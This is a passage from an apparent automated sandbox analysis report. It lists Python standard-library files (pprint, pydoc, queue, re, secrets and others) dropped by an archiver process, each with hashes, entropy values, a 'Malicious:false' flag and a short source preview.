                                                                                                                                                                                      SHA-512:53554A133380028FBD70613E52172DDCBA74CED0F02ADB974C49149EAC574198309595C8FCE10763316ED0CCD1D35C1672D9EDBBC3D42F518B9B782CCBD12B8E
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:# Author: Fred L. Drake, Jr...# fdrake@acm.org..#..# This is a simple little module I wrote to make life easier. I didn't..# see anything quite like it in the library, though I may have overlooked..# something. I wrote this when I was trying to read some heavily nested..# tuples with fairly non-descriptive content. This is modeled very much..# after Lisp/Scheme - style pretty-printing of lists. If you find it..# useful, thank small children who sleep at night....."""Support to pretty-print lists, tuples, & dictionaries recursively.....Very simple, but useful, especially in debugging data structures.....Classes..-------....PrettyPrinter().. Handle pretty-printing operations onto a stream using a configured.. set of formatting parameters.....Functions..---------....pformat().. Format a Python object into a pretty-printed representation.....pprint().. Pretty-print a Python object to a stream [default is sys.stdout].....saferepr().. Generate a '
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):23481
                                                                                                                                                                                      Entropy (8bit):4.4456903061634785
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:384:eQG31DiWobPzKZNVKtSG/6stsZhCs7SJ4ATp9FJ8sxCCxZhlklCB7xz7N2:ej1DizbGZNZG/ics7YTp9FJ8sxCCRel3
                                                                                                                                                                                      MD5:5B9AA68D3E57EAEA89D8183F2A0C543D
                                                                                                                                                                                      SHA1:84422184D267F877C5266E5A62901F60828AEB4E
                                                                                                                                                                                      SHA-256:3307B50C8E87ED3508340B455C371BFA6B148898D66FF8F0AD3D47EBF27E869E
                                                                                                                                                                                      SHA-512:9187A6A20064E29BDE5292BDC5BCD20B62DF7EAE949D8CD4A8B79E2E169D9FA5559C89187CFE6B308FB990F30BF1B06BA01B3D75F71A152DBC79E414E73B4297
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:#! /usr/bin/env python3..#..# Class for profiling python code. rev 1.0 6/2/94..#..# Written by James Roskind..# Based on prior profile module by Sjoerd Mullender.....# which was hacked somewhat by: Guido van Rossum...."""Class for profiling Python code."""....# Copyright Disney Enterprises, Inc. All Rights Reserved...# Licensed to PSF under a Contributor Agreement..#..# Licensed under the Apache License, Version 2.0 (the "License");..# you may not use this file except in compliance with the License...# You may obtain a copy of the License at..#..# http://www.apache.org/licenses/LICENSE-2.0..#..# Unless required by applicable law or agreed to in writing, software..# distributed under the License is distributed on an "AS IS" BASIS,..# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND,..# either express or implied. See the License for the specific language..# governing permissions and limitations under the License.......import sys..import time..import marshal....__all__ = ["run", "runctx"
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):30105
                                                                                                                                                                                      Entropy (8bit):4.33706442701786
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:384:oQG3E09NURDhs71UDrLgxAELHsvKSGdRo0t1O9dKPSJ0HXA6Erqr9roMBXLvZr8m:ojN9mhsLxAkduKPSOC0h
                                                                                                                                                                                      MD5:A709BCFBB2850262429D9FABBE67ABC7
                                                                                                                                                                                      SHA1:F02F963B567628F83D2AC5AC4246356140A85AE0
                                                                                                                                                                                      SHA-256:E1512CB76993E2113B3086CC61D1683ED9CE366C350D39D21A6BCBD222D8C660
                                                                                                                                                                                      SHA-512:734B996B4844A476187EF4D5F7C9534CDC79E8F12AD03E419C0CBF873F71D85DA85B3180B4636D2451A70FA11817A7D344CDB29FBCBE8EE89966E9BBA8A74E60
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:"""Class for printing reports on profiled python code."""....# Written by James Roskind..# Based on prior profile module by Sjoerd Mullender.....# which was hacked somewhat by: Guido van Rossum....# Copyright Disney Enterprises, Inc. All Rights Reserved...# Licensed to PSF under a Contributor Agreement..#..# Licensed under the Apache License, Version 2.0 (the "License");..# you may not use this file except in compliance with the License...# You may obtain a copy of the License at..#..# http://www.apache.org/licenses/LICENSE-2.0..#..# Unless required by applicable law or agreed to in writing, software..# distributed under the License is distributed on an "AS IS" BASIS,..# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND,..# either express or implied. See the License for the specific language..# governing permissions and limitations under the License.......import sys..import os..import time..import marshal..import re....from enum import Enum..from functools import cmp_to_key..from datacl
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):5400
                                                                                                                                                                                      Entropy (8bit):4.632984387456067
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:96:eE/i140+nvF19uaLUHzQRXwiX/H80Ni6BONKI1km8jKTlTZw+PTX+v5/fYvOn:eGV0+vZTLwQRXPPHriHhEu9Zw+PbM5/J
                                                                                                                                                                                      MD5:76D45ABE784519B8C8552EF253C46F85
                                                                                                                                                                                      SHA1:871A4ECAE472F27509ED8008F0438E942908C3DC
                                                                                                                                                                                      SHA-256:32F429813D305FA49201E761F11AFAA9D9AED79016F4980C2F01CC90AB8BA48B
                                                                                                                                                                                      SHA-512:DC594987EB61BFA87564637C661B361679A84B8042C6B54F2BFE04D9EDFF5F138E509D93D4C517FAD2192D154BFEB9210B1B61704F4F2B582CEA35FC279C4A35
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:"""Pseudo terminal utilities."""....# Bugs: No signal handling. Doesn't set slave termios and window size...# Only tested on Linux, FreeBSD, and macOS...# See: W. Richard Stevens. 1992. Advanced Programming in the..# UNIX Environment. Chapter 19...# Author: Steen Lumholt -- with additions by Guido.....from select import select..import os..import sys..import tty....# names imported directly for test mocking purposes..from os import close, waitpid..from tty import setraw, tcgetattr, tcsetattr....__all__ = ["openpty", "fork", "spawn"]....STDIN_FILENO = 0..STDOUT_FILENO = 1..STDERR_FILENO = 2....CHILD = 0....def openpty():.. """openpty() -> (master_fd, slave_fd).. Open a pty master/slave pair, using os.openpty() if possible.""".... try:.. return os.openpty().. except (AttributeError, OSError):.. pass.. master_fd, slave_name = _open_terminal().. slave_fd = slave_open(slave_name).. return master_fd, slave_fd....def master_open():.. """mas
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):8049
                                                                                                                                                                                      Entropy (8bit):4.51326914454816
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:96:mhnIB1tuDZ6ryJ0Dl8kr+5MboQE/Hcw1Zatu4dkKk6Dg7D3USWJ3DirI2dVDHsky:mnI5uB580/Z8UIg8Sm+rI2PDHsky
                                                                                                                                                                                      MD5:686E650CC5186DF740BB778A11376241
                                                                                                                                                                                      SHA1:32D7D66CAFDE71C7F16A33E52AB7CE093912B04F
                                                                                                                                                                                      SHA-256:BA4E5D1AC94FEC03BB7EDE8E1B7E4D56C8F165D9B3CDD130E16902D13489FCC4
                                                                                                                                                                                      SHA-512:F8E444ADB2359CFD7BA3B14B9388AF4023FB71AEF211FAB82373C0FDD24E9F2ABB065489A7F2AE693852AC189F3B3163620200FC968F071092596900ABB901F4
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:"""Routine to "compile" a .py file to a .pyc file.....This module has intimate knowledge of the format of .pyc files..."""....import enum..import importlib._bootstrap_external..import importlib.machinery..import importlib.util..import os..import os.path..import sys..import traceback....__all__ = ["compile", "main", "PyCompileError", "PycInvalidationMode"]......class PyCompileError(Exception):.. """Exception raised when an error occurs while attempting to.. compile the file..... To raise this exception, use.... raise PyCompileError(exc_type,exc_value,file[,msg]).... where.... exc_type: exception type to be used in error message.. type name can be accesses as class variable.. 'exc_type_name'.... exc_value: exception value to be used in error message.. can be accesses as class variable 'exc_value'.... file: name of file being compiled to be used in error message.. c
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):11710
                                                                                                                                                                                      Entropy (8bit):4.504337884600187
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:192:BzHcJfRYL1hkj7CXEpriGyN1R73rM9R5BWq/3wSg9bberhTtsahL:Bz8JRYLXE3ab77MD5wq/34buhxsaR
                                                                                                                                                                                      MD5:67EDE4D94842456FA89ABA6B55AA448C
                                                                                                                                                                                      SHA1:ED3E010535D4418EE95C61F65674F5B3FEBDDFE1
                                                                                                                                                                                      SHA-256:E87683A58D47E7E7C49BD1BB83BEC01BC8EDF803DEFF289AC30C2C5FCC8DA979
                                                                                                                                                                                      SHA-512:7D500CC706E1D2936B22894979881AE3A7BC40949A085780F684C64441227ECCFBC6DB5B6711CF82E169169761B291AB0458E46E7835C8D41947B2CA002853B4
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:"""Parse a Python module and describe its classes and functions.....Parse enough of a Python file to recognize imports and class and..function definitions, and to find out the superclasses of a class.....The interface consists of a single function:.. readmodule_ex(module, path=None)..where module is the name of a Python module, and path is an optional..list of directories where the module is to be searched. If present,..path is prepended to the system search path sys.path. The return value..is a dictionary. The keys of the dictionary are the names of the..classes and functions defined in the module (including classes that are..defined via the from XXX import YYY construct). The values are..instances of classes Class and Function. One special key/value pair is..present for packages: the key '__path__' has a list as its value which..contains the package search path.....Classes and Functions have a common superclass: _Object. Every instance..has the following attributes:.. mod
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):112431
                                                                                                                                                                                      Entropy (8bit):4.588435548990698
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:3072:dsw0YAnUM+dsvmxD3bDhaC7p09Nsrnz0loD/im9OTB3P:ds8AcdsGDP8jvAzRD/nON3P
                                                                                                                                                                                      MD5:66C9AF70881505FD7E9B83465C102F03
                                                                                                                                                                                      SHA1:B5F055339170C7755BE08763AD9E5D5A543DDF29
                                                                                                                                                                                      SHA-256:F4D1143A78C6B993BE749C773D0E83313A2F6E118E1CC676C1CA4EFA15CFD7B9
                                                                                                                                                                                      SHA-512:3581CD47E0E9AA713A2F151EFBDFC2CCFA7F80609A5E25A42CD6D01A641CA1AC4666F548F2197E827FA46983D1FEFDE87E55126690BAA04296991A64EB64930F
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:#!/usr/bin/env python3.."""Generate Python documentation in HTML or text for interactive use.....At the Python interactive prompt, calling help(thing) on a Python object..documents the object, and calling help() starts up an interactive..help session.....Or, at the shell command line outside of Python:....Run "pydoc <name>" to show documentation on something. <name> may be..the name of a function, module, package, or a dotted reference to a..class or function within a module or module in a package. If the..argument contains a path segment delimiter (e.g. slash on Unix,..backslash on Windows) it is treated as the path to a Python source file.....Run "pydoc -k <keyword>" to search for a keyword in the synopsis lines..of all available modules.....Run "pydoc -n <hostname>" to start an HTTP server with the given..hostname (default: localhost) on the local machine.....Run "pydoc -p <port>" to start an HTTP server on the given port on the..local machine. Port number 0 can be used to get an
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):11822
                                                                                                                                                                                      Entropy (8bit):4.376403701654197
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:96:8yWZYD0IZsvHoH13DwaZbr1r+OO4HHHhBxwrA17IVhHohkwoa0vui8uftYi6zRSh:8ffIZTlZfphhVaazoBVYJeDQazkRQ
                                                                                                                                                                                      MD5:F777EB2684C7FFA466D1546E1972F8F1
                                                                                                                                                                                      SHA1:A2E1B0ADBE02008139E1DAFABFD14E3D33E5539A
                                                                                                                                                                                      SHA-256:3160B770DC5CBDF0A5F9297DD8EA7FB77ACD99B36AF8088C8015B119D2E5069F
                                                                                                                                                                                      SHA-512:7BDEC8B19CDA7A6682A93719AB551A3EA7DB157685EFD208F56B51049A177E7A0D69235AA954F755D881DC4BD8670D4CB120949EFEEE86148CFB5544A4D487EE
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:'''A multi-producer, multi-consumer queue.'''....import threading..import types..from collections import deque..from heapq import heappush, heappop..from time import monotonic as time..try:.. from _queue import SimpleQueue..except ImportError:.. SimpleQueue = None....__all__ = ['Empty', 'Full', 'Queue', 'PriorityQueue', 'LifoQueue', 'SimpleQueue']......try:.. from _queue import Empty..except ImportError:.. class Empty(Exception):.. 'Exception raised by Queue.get(block=0)/get_nowait().'.. pass....class Full(Exception):.. 'Exception raised by Queue.put(block=0)/put_nowait().'.. pass......class Queue:.. '''Create a queue object with a given maximum size..... If maxsize is <= 0, the queue size is infinite... '''.... def __init__(self, maxsize=0):.. self.maxsize = maxsize.. self._init(maxsize).... # mutex must be held whenever the queue is mutating. All methods.. # that acquire mutex must release it before returning.
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):7510
                                                                                                                                                                                      Entropy (8bit):4.528644805401654
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:192:nP6LcGY5uUuWgCSqkc97dlDsYJuLz9/x/1d0:CjUuokcddl5oM
                                                                                                                                                                                      MD5:3B06A77D6A302CB952C0A488387F1624
                                                                                                                                                                                      SHA1:2C60F0345E160E7A793091EE6021E5A5760A3523
                                                                                                                                                                                      SHA-256:72312E4C1815E29A236D62871D313A9A2393A424A3E04AC3A1393A09C032D22D
                                                                                                                                                                                      SHA-512:4891E6FC7C6C29DFFDC632835B4272012B61A0A703852C64A80AACA35FB083747C650CA0D24C70283AE53DB975A7F58D0132D3869827C4EAC79F51653E8BACF1
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:#! /usr/bin/env python3...."""Conversions to/from quoted-printable transport encoding as per RFC 1521."""....# (Dec 1991 version).....__all__ = ["encode", "decode", "encodestring", "decodestring"]....ESCAPE = b'='..MAXLINESIZE = 76..HEX = b'0123456789ABCDEF'..EMPTYSTRING = b''....try:.. from binascii import a2b_qp, b2a_qp..except ImportError:.. a2b_qp = None.. b2a_qp = None......def needsquoting(c, quotetabs, header):.. """Decide whether a particular byte ordinal needs to be quoted..... The 'quotetabs' flag indicates whether embedded tabs and spaces should be.. quoted. Note that line-ending tabs and spaces are always encoded, as per.. RFC 1521... """.. assert isinstance(c, bytes).. if c in b' \t':.. return quotetabs.. # if header, we have to escape _ because _ is used to escape space.. if c == b'_':.. return header.. return c == ESCAPE or not (b' ' <= c <= b'~')....def quote(c):.. """Quote a single character.""".. assert isins
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):34151
                                                                                                                                                                                      Entropy (8bit):4.491133205294742
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:768:C3reJ1jUijTWhhG3AF+ziPmfHbWW+DN5ayEW:ViG3y+zSmz8x
                                                                                                                                                                                      MD5:D9F1783FF1C70E418F49EB5862894B8C
                                                                                                                                                                                      SHA1:0F5A7AA6B90253596839C64E504A8C445F3265A0
                                                                                                                                                                                      SHA-256:E2F9C9E08EE7A922D6AE50FED25CB4EFCF833B86D857D846A2BB6C55600D3C25
                                                                                                                                                                                      SHA-512:CABCE9F6CE02F7CD1AE63840E208C16AFAEF9BB66261F8D8F1533F116F029247199BF4F5FF80545681A2DA8182C7AB3AD8CA98CD03416622962EB59726B8B6BE
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:"""Random variable generators..... bytes.. -----.. uniform bytes (values between 0 and 255).... integers.. --------.. uniform within range.... sequences.. ---------.. pick random element.. pick random sample.. pick weighted random sample.. generate random permutation.... distributions on the real line:.. ------------------------------.. uniform.. triangular.. normal (Gaussian).. lognormal.. negative exponential.. gamma.. beta.. pareto.. Weibull.... distributions on the circle (angles 0 to 2pi).. ---------------------------------------------.. circular uniform.. von Mises....General notes on the underlying Mersenne Twister core generator:....* The period is 2**19937-1...* It is one of the most extensively tested generators in existence...* The random() method is implemented in C, executes i
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):16243
                                                                                                                                                                                      Entropy (8bit):4.697959708532748
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:384:6bda8nr7PRL1AoscB8kRD/y/0cy/9O1+1Q0:6pa8nrrRpAoscBBRD6/y/9O1+1X
                                                                                                                                                                                      MD5:F04D4A880157A5A39BBAFC0073B8B222
                                                                                                                                                                                      SHA1:92515B53EE029B88B517C1F2F26F6D022561F9B4
                                                                                                                                                                                      SHA-256:5AE8929F8C0FB9A0F31520D0A909E5637D86C6DEBB7C0B8CBACC710C721F9F7D
                                                                                                                                                                                      SHA-512:556AAACFC4237B8AB611922E2052407A6BE98A7FB6E36E8D3ED14412B22E50ABAC617477F53ACFA99DBA1824B379C86376991739D68749EB5F162E020E7999CB
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:#..# Secret Labs' Regular Expression Engine..#..# re-compatible interface for the sre matching engine..#..# Copyright (c) 1998-2001 by Secret Labs AB. All rights reserved...#..# This version of the SRE library can be redistributed under CNRI's..# Python 1.6 license. For any other use, please contact Secret Labs..# AB (info@pythonware.com)...#..# Portions of this engine have been developed in cooperation with..# CNRI. Hewlett-Packard provided funding for 1.6 integration and..# other compatibility work...#....r"""Support for regular expressions (RE).....This module provides regular expression matching operations similar to..those found in Perl. It supports both 8-bit and Unicode strings; both..the pattern and the strings being processed can contain null bytes and..characters outside the US ASCII range.....Regular expressions can contain both special and ordinary characters...Most ordinary characters, like "A", "a", or "0", are the simplest..regular expressions; they simply match them
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):5428
                                                                                                                                                                                      Entropy (8bit):4.417412104082839
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:96:Sr5xgG+4UXDromvJYKvi8hkEfoerKBLi22z80OsgmtoJLe4N90Mvs7hui:I+BromPUjyJ+LeQ2Yri
                                                                                                                                                                                      MD5:E7C51384148475BFFEB9729DF4B33B69
                                                                                                                                                                                      SHA1:58109E3AE253B6F9BF94BD8A2C880BEAE0EDDF94
                                                                                                                                                                                      SHA-256:3BE6CDE6103319B3CA44BBC4D40C60E0BCB14A53E93E2578E8E4E850F4A8C66B
                                                                                                                                                                                      SHA-512:A7C81FD784E537DA08A8EAD5A6C635B66123DE815B73FAE2B9F1662CF49AF4C9E41E648075CC0EE2A64C034FA38DA4A4E90163E9B955B17D20490EEB86004341
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:"""Redo the builtin repr() (representation) but with limits on most sizes."""....__all__ = ["Repr", "repr", "recursive_repr"]....import builtins..from itertools import islice..from _thread import get_ident....def recursive_repr(fillvalue='...'):.. 'Decorator to make a repr function return fillvalue for a recursive call'.... def decorating_function(user_function):.. repr_running = set().... def wrapper(self):.. key = id(self), get_ident().. if key in repr_running:.. return fillvalue.. repr_running.add(key).. try:.. result = user_function(self).. finally:.. repr_running.discard(key).. return result.... # Can't use functools.wraps() here because of bootstrap issues.. wrapper.__module__ = getattr(user_function, '__module__').. wrapper.__doc__ = getattr(user_function, '__doc__').. wrapper.__name__ = getattr(user_function, '__name__').
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):8036
                                                                                                                                                                                      Entropy (8bit):4.287904072572339
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:192:2rW3kbV7us2JNNHU9lfnhRU4Fnv4blKREfGCcshW5YvNEEv+B:KGk1uHU9xhR5nvxCED1EWB
                                                                                                                                                                                      MD5:FE0FF94FFFE2562374E8A375642273DF
                                                                                                                                                                                      SHA1:21A40B86C9C389A3A8CF23CCC9CEB34E31DF5365
                                                                                                                                                                                      SHA-256:F06D3AFBA28DE908AC91EA1361C66D5F567D4755EEECAF91740019B7E64B25DC
                                                                                                                                                                                      SHA-512:98070C06DC839CC169F9E5CE4850C9B001F52645531BDC309C411D9B98BE200003FE3E6D99872F782A92DCF97C21A7AFD7CCC351F329D24C9FF1739856755CB8
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:"""Word completion for GNU readline.....The completer completes keywords, built-ins and globals in a selectable..namespace (which defaults to __main__); when completing NAME.NAME..., it..evaluates (!) the expression up to the last dot and completes its attributes.....It's very cool to do "import sys" type "sys.", hit the completion key (twice),..and see the list of names defined by the sys module!....Tip: to use the tab key as the completion key, call.... readline.parse_and_bind("tab: complete")....Notes:....- Exceptions raised by the completer function are *ignored* (and generally cause.. the completion to fail). This is a feature -- since readline sets the tty.. device in raw (or cbreak) mode, printing a traceback wouldn't work well.. without some complicated hoopla to save, reset and restore the tty state.....- The evaluation of the NAME.NAME... form may cause arbitrary application.. defined code to be executed if an object with a __getattr__ hook is found... Since it is th
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, Unicode text, UTF-8 text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):13432
                                                                                                                                                                                      Entropy (8bit):4.4682911817309865
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:384:E5HgdO+nKGY9d9GxlJ4fr+2O4lAfhdgkdn+eO9:E5p5z3r+FRhdJO9
                                                                                                                                                                                      MD5:EAD7DE516F81BDF655C6E96A2BC0D3C9
                                                                                                                                                                                      SHA1:FE69379AC14C0F742E02482839B20FDA1BFE4325
                                                                                                                                                                                      SHA-256:001DEC8ADF8925F2C61C25F4F4D49CDAD60E2AF45D1B34692C60AB022889120B
                                                                                                                                                                                      SHA-512:3A47A82096E5849EEEF06B5B79EFC687DB6D0E93716E3C3B0C13135BD70464943213475E353C3C3F1A89EFB068EC4EF1C394A4EB4D550425FD5146ED49CD6BD9
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:"""runpy.py - locating and running Python code using the module namespace....Provides support for locating and running Python scripts using the Python..module namespace instead of the native filesystem.....This allows Python code to play nicely with non-filesystem based PEP 302..importers when locating support scripts as well as when importing modules..."""..# Written by Nick Coghlan <ncoghlan at gmail.com>..# to implement PEP 338 (Executing Modules as Scripts)......import sys..import importlib.machinery # importlib first so we can test #15386 via -m..import importlib.util..import io..import types..import os....__all__ = [.. "run_module", "run_path",..]....class _TempModule(object):.. """Temporarily replace a module in sys.modules with an empty namespace""".. def __init__(self, mod_name):.. self.mod_name = mod_name.. self.module = types.ModuleType(mod_name).. self._saved_module = [].... def __enter__(self):.. mod_name = self.mod_name..
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):6518
                                                                                                                                                                                      Entropy (8bit):4.428021460534201
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:96:7q7NKEDtr4SBrumjWpdBpBO6tibxmPKq5d6JIad/vkk:7q7N7jU26ut2Q/vkk
                                                                                                                                                                                      MD5:BBC46866A07502770BEC1716C4F1CEF0
                                                                                                                                                                                      SHA1:6E1FD86C4786295109C5F67194C980238A780C56
                                                                                                                                                                                      SHA-256:D337D7DDBEB4852D806AE3D29DD73C0F2E0A332C8CE4BEADDF7173C34D6849D8
                                                                                                                                                                                      SHA-512:FF21A29BDB6E29D0A2FEB1FC711B33055001D529F28034C2F37D5159BB709D93FE51305F43D60B36CDE7D181C8876EB7FD2BBC1D43E49F2FE3CD27BD9DB832F4
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:"""A generally useful event scheduler class.....Each instance of this class manages its own queue...No multi-threading is implied; you are supposed to hack that..yourself, or use a single instance per application.....Each instance is parametrized with two functions, one that is..supposed to return the current time, one that is supposed to..implement a delay. You can implement real-time scheduling by..substituting time and sleep from built-in module time, or you can..implement simulated time by writing your own functions. This can..also be used to integrate scheduling with STDWIN events; the delay..function is allowed to modify the queue. Time can be expressed as..integers or floating point numbers, as long as it is consistent.....Events are specified by tuples (time, priority, action, argument, kwargs)...As in UNIX, lower priority numbers mean higher priority; in this..way the queue can be maintained as a priority queue. Execution of the..event means calling the action function, pa
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):2108
                                                                                                                                                                                      Entropy (8bit):5.0681098576980395
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:48:OHe6kvHbJSNg/Yya6+N+Rv+f3xg8boRkGm26/UZ68fpqstap:mJk1Sq/YN6pRvGxgnRkGm26/UZ6+qAK
                                                                                                                                                                                      MD5:C603DB6D1DC7CA53EF4EDF99ADE55CD6
                                                                                                                                                                                      SHA1:36FD0055E017C494EB0E37FD15BA520896C3E4CA
                                                                                                                                                                                      SHA-256:8B91B370319945770CCC838EBDF438313212129EB1F7E1938DD0882688EC7A18
                                                                                                                                                                                      SHA-512:99F3C414DC3C997D5E246F427628419538115DF21EB7F48A690895AEA179C6F4596BDA0BB75FC9756281EEFE6C926393C6745C65EC6F916FA554B37FAC3804C3
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:"""Generate cryptographically strong pseudo-random numbers suitable for..managing secrets such as account authentication, tokens, and similar.....See PEP 506 for more information...https://www.python.org/dev/peps/pep-0506/...."""....__all__ = ['choice', 'randbelow', 'randbits', 'SystemRandom',.. 'token_bytes', 'token_hex', 'token_urlsafe',.. 'compare_digest',.. ]......import base64..import binascii....from hmac import compare_digest..from random import SystemRandom...._sysrand = SystemRandom()....randbits = _sysrand.getrandbits..choice = _sysrand.choice....def randbelow(exclusive_upper_bound):.. """Return a random int in the range [0, n).""".. if exclusive_upper_bound <= 0:.. raise ValueError("Upper bound must be positive.").. return _sysrand._randbelow(exclusive_upper_bound)....DEFAULT_ENTROPY = 32 # number of bytes to return by default....def token_bytes(nbytes=None):.. """Return a random byte string containing *nbytes* bytes.....
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):20155
                                                                                                                                                                                      Entropy (8bit):4.441366171897365
                                                                                                                                                                                      Encrypted:false
